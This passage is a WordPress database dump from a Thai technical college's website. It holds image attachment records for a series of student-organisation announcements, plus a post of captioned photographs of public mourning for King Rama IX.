(4568, 1, '2018-11-15 22:16:40', '2018-11-15 15:16:40', '', 'ประกาศ-อวท-2561-11', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-11', '', '', '2018-11-15 22:16:40', '2018-11-15 15:16:40', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-11.png', 0, 'attachment', 'image/png', 0),
(4569, 1, '2018-11-15 22:16:56', '2018-11-15 15:16:56', '', 'ประกาศ-อวท-2561-12', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-12', '', '', '2018-11-15 22:16:56', '2018-11-15 15:16:56', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-12.png', 0, 'attachment', 'image/png', 0),
(4570, 1, '2018-11-15 22:17:16', '2018-11-15 15:17:16', '', 'ประกาศ-อวท-2561-13', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-13', '', '', '2018-11-15 22:17:16', '2018-11-15 15:17:16', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-13.png', 0, 'attachment', 'image/png', 0),
(4571, 1, '2018-11-15 22:17:35', '2018-11-15 15:17:35', '', 'ประกาศ-อวท-2561-14', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-14', '', '', '2018-11-15 22:17:35', '2018-11-15 15:17:35', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-14.png', 0, 'attachment', 'image/png', 0),
(4572, 1, '2018-11-15 22:17:54', '2018-11-15 15:17:54', '', 'ประกาศ-อวท-2561-15', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-15', '', '', '2018-11-15 22:17:54', '2018-11-15 15:17:54', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-15.png', 0, 'attachment', 'image/png', 0),
(4573, 1, '2018-11-15 22:18:06', '2018-11-15 15:18:06', '', 'ประกาศ-อวท-2561-16', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-16', '', '', '2018-11-15 22:18:06', '2018-11-15 15:18:06', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-16.png', 0, 'attachment', 'image/png', 0),
(4574, 1, '2018-11-15 22:18:16', '2018-11-15 15:18:16', '', 'ประกาศ-อวท-2561-17', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-17', '', '', '2018-11-15 22:18:16', '2018-11-15 15:18:16', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-17.png', 0, 'attachment', 'image/png', 0),
(4575, 1, '2018-11-15 22:18:28', '2018-11-15 15:18:28', '', 'ประกาศ-อวท-2561-18', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-18', '', '', '2018-11-15 22:18:28', '2018-11-15 15:18:28', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-18.png', 0, 'attachment', 'image/png', 0),
(4576, 1, '2018-11-15 22:18:35', '2018-11-15 15:18:35', '', 'ประกาศ-อวท-2561-19', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-19', '', '', '2018-11-15 22:18:35', '2018-11-15 15:18:35', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-19.png', 0, 'attachment', 'image/png', 0),
(4577, 1, '2018-11-15 22:18:42', '2018-11-15 15:18:42', '', 'ประกาศ-อวท-2561-20', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-20', '', '', '2018-11-15 22:18:42', '2018-11-15 15:18:42', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-20.png', 0, 'attachment', 'image/png', 0),
(4578, 1, '2018-11-15 22:18:49', '2018-11-15 15:18:49', '', 'ประกาศ-อวท-2561-21', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-21', '', '', '2018-11-15 22:18:49', '2018-11-15 15:18:49', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-21.png', 0, 'attachment', 'image/png', 0),
(4579, 1, '2018-11-15 22:18:58', '2018-11-15 15:18:58', '', 'ประกาศ-อวท-2561-22', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-22', '', '', '2018-11-15 22:18:58', '2018-11-15 15:18:58', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-22.png', 0, 'attachment', 'image/png', 0),
(4580, 1, '2018-11-15 22:19:06', '2018-11-15 15:19:06', '', 'ประกาศ-อวท-2561-23', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-23', '', '', '2018-11-15 22:19:06', '2018-11-15 15:19:06', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-23.png', 0, 'attachment', 'image/png', 0),
(4581, 1, '2018-11-15 22:19:19', '2018-11-15 15:19:19', '', 'ประกาศ-อวท-2561-24', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-24', '', '', '2018-11-15 22:19:19', '2018-11-15 15:19:19', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-24.png', 0, 'attachment', 'image/png', 0),
(4582, 1, '2018-11-15 22:19:42', '2018-11-15 15:19:42', '', 'ประกาศ-อวท-2561-25', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-25', '', '', '2018-11-15 22:19:42', '2018-11-15 15:19:42', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-25.png', 0, 'attachment', 'image/png', 0),
(4583, 1, '2018-11-15 22:20:02', '2018-11-15 15:20:02', '', 'ประกาศ-อวท-2561-26', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-26', '', '', '2018-11-15 22:20:02', '2018-11-15 15:20:02', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-26.png', 0, 'attachment', 'image/png', 0),
(4584, 1, '2018-11-15 22:20:18', '2018-11-15 15:20:18', '', 'ประกาศ-อวท-2561-27', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-27', '', '', '2018-11-15 22:20:18', '2018-11-15 15:20:18', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-27.png', 0, 'attachment', 'image/png', 0),
(4585, 1, '2018-11-15 22:20:35', '2018-11-15 15:20:35', '', 'ประกาศ-อวท-2561-28', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-28', '', '', '2018-11-15 22:20:35', '2018-11-15 15:20:35', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-28.png', 0, 'attachment', 'image/png', 0),
(4586, 1, '2018-11-15 22:20:45', '2018-11-15 15:20:45', '', 'ประกาศ-อวท-2561-29', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-29', '', '', '2018-11-15 22:20:45', '2018-11-15 15:20:45', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-29.png', 0, 'attachment', 'image/png', 0),
(4587, 1, '2018-11-15 22:20:54', '2018-11-15 15:20:54', '', 'ประกาศ-อวท-2561-30', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-30', '', '', '2018-11-15 22:20:54', '2018-11-15 15:20:54', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-30.png', 0, 'attachment', 'image/png', 0),
(4588, 1, '2018-11-15 22:42:53', '2018-11-15 15:42:53', ' \r\n\r\n<img class=\"aligncenter wp-image-4586\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-29-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4585\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-28-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4584\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-27-724x1024.png\" alt=\"\" width=\"400\" height=\"566\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4583\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-26-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4582\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-25-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4581\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-24-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4580\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-23-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4579\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-22-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4578\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-21-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4577\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-20-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4576\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-19-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4575\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-18-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4574\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-17-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4573\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-16-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4572\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-15-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4571\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-14-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4570\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-13-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4569\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-12-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4568\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-11-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4567\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-10-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4566\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-09-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4565\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-08-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4564\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-07-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4559\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-02-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4558\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-01-724x1024.png\" alt=\"\" width=\"400\" height=\"566\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4563\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-06-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4562\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-05-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4561\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-04-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4560\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-03-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n<img class=\"aligncenter wp-image-4587\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-30-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />', 'ประชาสัมพันธ์-อวท.วท.รย.-', '', 'inherit', 'closed', 'closed', '', '4280-revision-v1', '', '', '2018-11-15 22:42:53', '2018-11-15 15:42:53', '', 4280, 'http://www.technicrayong.ac.th/4280-revision-v1/', 0, 'revision', '', 0),
(4589, 1, '2018-11-15 23:07:41', '2018-11-15 16:07:41', '', 'ประกาศ-อวท-2561-31', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-31', '', '', '2018-11-15 23:07:41', '2018-11-15 16:07:41', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-31.png', 0, 'attachment', 'image/png', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4590, 1, '2018-11-15 23:08:36', '2018-11-15 16:08:36', ' \r\n\r\n<img class=\"aligncenter wp-image-4586\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-29-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4585\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-28-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4584\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-27-724x1024.png\" alt=\"\" width=\"400\" height=\"566\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4589\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-31-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4583\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-26-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4582\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-25-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4581\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-24-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4580\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-23-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4579\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-22-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4578\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-21-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4577\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-20-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4576\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-19-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4575\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-18-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4574\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-17-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4573\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-16-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4572\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-15-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4571\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-14-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4570\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-13-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4569\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-12-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4568\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-11-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4567\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-10-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4566\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-09-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4565\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-08-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4564\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-07-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4559\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-02-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4558\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-01-724x1024.png\" alt=\"\" width=\"400\" height=\"566\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4563\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-06-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4562\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-05-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4561\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-04-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4560\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-03-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n<img class=\"aligncenter wp-image-4587\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-30-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />', 'ประชาสัมพันธ์-อวท.วท.รย.-', '', 'inherit', 'closed', 'closed', '', '4280-revision-v1', '', '', '2018-11-15 23:08:36', '2018-11-15 16:08:36', '', 4280, 'http://www.technicrayong.ac.th/4280-revision-v1/', 0, 'revision', '', 0),
(4591, 3, '2018-11-16 09:33:26', '2018-11-16 02:33:26', '<img class=\"aligncenter size-large wp-image-4536\" src=\"/wp-content/uploads/2018/11/8-Roengchai-Kongmuang-copy-683x1024.jpg\" alt=\"\" width=\"640\" height=\"960\" />\r\n<p style=\"text-align: center;\">คุณแม่ชาวมุสลิมชี้ชวนให้ลูกสาวอ่านเนื้อหาในวารสารฉบับพิเศษ ที่แจกในงานร่วมถวายความอาลัยของพี่น้องชาวมุสลิมที่ถูกจัดขึ้นที่มัสยิดกลางแห่งชาติ กรุงเทพมหานคร</p>\r\n<img class=\"aligncenter size-large wp-image-4537\" src=\"/wp-content/uploads/2018/11/20-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">กรมส่งเสริมวัฒนธรรม กระทรวงวัฒนธรรม ร่วมกับเครือข่ายศิลปะและวัฒนธรรม จังหวัดปทุมธานี อาทิ ศิลปินพื้นบ้าน สถาบันการศึกษาในจังหวัดปทุมธานี ข้าราชการ และประชาชน ได้จัดงานรวมใจเครือข่ายศิลปะและวัฒนธรรม เพื่อแสดงความจงรักภักดีและรําลึกพระมหากรุณาธิคุณอย่างหาที่สุดมิได้แด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ผู้เป็น “อัครศิลปินเหนือเกล้า” ณ หออัครศิลปิน อําเภอคลองหลวง จังหวัดปทุมธานี</p>\r\n<img class=\"aligncenter size-large wp-image-4538\" src=\"/wp-content/uploads/2018/11/39-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังซึ่งเป็นนักดนตรีกําลังเป่าทูบาร่วมกับเพื่อนร่วมวงคนอื่น ๆ ในกิจกรรมที่จัดขึ้น ณ ทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี</p>\r\n<img class=\"aligncenter size-large wp-image-4539\" src=\"/wp-content/uploads/2018/11/49-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังชายจากทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี ก้มกราบพระบรมฉายาลักษณ์พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช หลังจากร่วมกิจกรรมแปรอักษรเป็นรูปเลข ๙ และขับร้อง 9 บทเพลงถวายพ่อหลวง ด้วยสํานึกในพระมหากรุณาธิคุณหาที่สุดมิได้</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“รูปถ่ายแทนความคิดถึง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4540\" src=\"/wp-content/uploads/2018/11/58-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนนําพระบรมฉายาลักษณ์ของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชติดตัวมาจากบ้าน เพื่อรอรับเสด็จพระบรมวงศานุวงศ์ที่เสด็จมาประกอบพิธีทางศาสนา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สะพานเบลีย์”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4541\" src=\"/wp-content/uploads/2018/11/65-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เมื่อเส้นทางสัญจรปกติไม่สามารถรองรับประชาชนจํานวนมากที่เข้ามาบริเวณสนามหลวงได้รัฐบาลจึงสั่งให้มีการสร้างสะพานชั่วคราวข้ามคลองหลอดขึ้น 2 จุด คือ บริเวณด้านหน้าโรงแรมรัตนโกสินทร์และด้านหลังกระทรวงกลาโหมเป็น “สะพานเบลีย์” ที่คิดค้นขึ้นโดยวิศวกรโยธาชาวอังกฤษ เซอร์โดนัลด์ โคลแมน เบลีย์ (Sir Donald Coleman Bailey) ในช่วงสงครามโลกครั้งที่ 2</p>\r\n<img class=\"aligncenter size-large wp-image-4542\" src=\"/wp-content/uploads/2018/11/69-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ชาวต่างชาตินําดอกไม้มาถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9 ร่วมกับภรรยาและเพื่อนชาวไทย ณ บริเวณหน้าวัดพระศรีรัตนศาสดาราม</p>\r\n<img class=\"aligncenter size-large wp-image-4543\" src=\"/wp-content/uploads/2018/11/78-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ปรางจันทร์ แซ่เฮ้ง แม่ค้าขายก๋วยเตี๋ยวเรือที่คลอง 7 จังหวัดปทุมธานี หลั่งนํ้าตาอย่างซาบซึ้งใจเมื่อพูดถึงวันที่ให้ศิลปินอิสระนําภาพในหลวงรัชกาลที่ 9 มาติดไว้ที่ผนังหน้าบ้านที่ครอบครัวของเธออาศัยมาตั้งแต่รุ่นปู่ ย่า</p>\r\n<img class=\"aligncenter size-large wp-image-4544\" src=\"/wp-content/uploads/2018/11/80-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" 